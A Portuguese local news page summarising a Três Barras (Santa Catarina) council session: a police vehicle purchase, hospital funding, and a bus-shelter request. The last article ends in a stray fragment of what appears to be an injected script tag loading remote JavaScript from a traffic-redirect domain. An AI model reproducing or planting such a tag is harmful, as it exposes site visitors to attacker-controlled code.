InícioDestaqueResumão da Sessão da Câmara

Resumão da Sessão da Câmara

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...

Vereadores aprovam aquisição de viatura para a PM de Três Barras

Recursos são do Convênio de Trânsito

 

Os vereadores tresbarrenses aprovaram na semana passada o projeto de lei 40/2018, que autoriza o executivo a adquirir um novo carro para a Polícia Militar de Três Barras. O texto tramitava nas comissões e recebeu o parecer favorável na quarta-feira, 03, tão logo foi votado em plenário e teve apoio unânime dos vereadores.

De acordo com o texto, o executivo fica autorizado a adquirir um veículo através dos recursos do Convênio de Trânsito que o município mantém com a Polícia Militar. Dessa forma, a aquisição não gera ônus para os cofres municipais.

O texto ainda garante que o veículo adquirido seja utilizado como viatura no município de Três Barras para o serviço ostensivo e preventivo motorizado, através do terceiro Batalhão de Polícia Militar do Estado de Santa Catarina.

Ao defender o projeto que teve origem no executivo o vereador Laudecir José Gonçalves, o Barriga (PR), destacou que a segurança pública é uma das prioridades desta gestão e que “a parceria entre o município e a polícia militar tem garantido um bom trabalho” no município de Três Barras.

Já o vereador Ernani Wogeinaki Jr (PSB), destacou que os vereadores têm compromisso com a segurança pública: “desde o nosso primeiro dia de mandato defendemos a estruturação da nossa polícia militar”, destacou.

 

 

Vereadores aprovam destinação de 75 mil reais ao hospital de Três Barras

Recursos foram autorizados na sessão da última segunda-feira, 08

Os vereadores de Três Barras autorizaram que o executivo destine recursos financeiros para o Hospital Felix da Costa Gomes, ainda no exercício de 2018. O objetivo é auxiliar no custeio da instituição que garante os serviços de saúde mais complexos do município. A aprovação ocorreu de forma unânime na última segunda-feira, 08.

O projeto 38/2018 teve autoria no executivo e autoriza o prefeito a firmar um “termo de colaboração” com a Fundação Hospitalar de Três Barras, onde será repassado aos cofres da instituição o valor de R$ 75 mil reais.

A medida se faz necessária para compensar o trabalhão que a instituição realiza no município.

 

 

Vereador solicita construção de abrigo de passageiros no KM6

A solicitação de Canani foi apresentada na sessão da última segunda-feira, 08.

João Canani (PSB) solicitou que o executivo municipal estude a construção de um abrigo para passageiros que utilizam o transporte público, na localidade de Barras Grande, KM6, na rodovia SC 303 em Três Barras. O vereador relatou que visitou um local onde não há a estrutura e que em dias de chuva os passageiros, além de ficarem expostos à água, têm de esperar no barro.

A solicitação de Canani foi apresentada na sessão da última segunda-feira, 08, através de indicação enviada ao prefeito municipal.

De acordo com o texto é necessário construir um abrigo no ponto de ônibus localizado nas proximidades da residência do Sr João Pedro Simão, sentido Três Barras à Canoinhas,  na SC 303. O vereador relatou na tribuna que a estrutura existe no outro lado da rodovia, porém os passageiros que desejam ir a cidade vizinha não contam com nenhuma proteção para aguardar o transporte público.

Na mesma indicação, Canani salientou que será necessário recolocar tubos para o escoamento da água, que segundo o vereador, foram retirados pela SAMASA – Serviço Autônomo de Águas e Saneamento Ambiental – durante uma manutenção da rede de distribuição de água…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.